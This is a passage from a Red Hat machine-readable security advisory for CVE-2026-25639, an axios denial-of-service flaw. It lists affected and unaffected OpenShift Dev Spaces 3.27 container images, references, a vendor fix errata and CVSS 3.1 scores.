"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T15:41:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6192"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
